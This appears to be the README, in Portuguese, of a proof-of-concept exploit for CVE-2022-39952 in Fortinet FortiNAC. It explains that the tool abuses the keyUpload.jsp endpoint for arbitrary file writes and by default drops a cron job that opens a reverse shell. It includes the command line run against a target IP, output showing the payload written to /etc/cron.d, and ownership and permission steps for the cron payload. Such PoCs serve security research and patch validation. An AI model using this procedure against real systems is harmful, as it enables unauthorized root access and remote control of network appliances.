
Prova de Conceito para CVE-2022-39952
POC para o CVE-2022-39952 que afeta o Fortinet FortiNAC
A configuração padrão deste exploit cria um cron job para gerar um
reverse shell. Certifique-se de alterar o arquivo payload para se adequar ao seu ambiente.
Uma análise técnica da causa raiz da vulnerabilidade e indicadores de comprometimento pode ser encontrada em nosso blog: https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs
Este POC abusa do endpoint keyUpload.jsp para realizar uma escrita arbitrária de arquivos.
root@kali:~/CVE-2022-39952# python3 CVE-2022-39952.py --target 10.0.40.85 --file payload
[+] Wrote payload to /etc/cron.d/payload
[+] Payload successfully delivered
Se estiver usando um payload baseado em cron, certifique-se de que o arquivo payload tenha as permissões e o proprietário apropriados:
sudo chown root:root payload
sudo chmod 0644 payload
Atualize para a versão mais recente seguindo as instruções no PSIRT https://www.fortiguard.com/psirt/FG-IR-22-300
Este software foi criado exclusivamente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.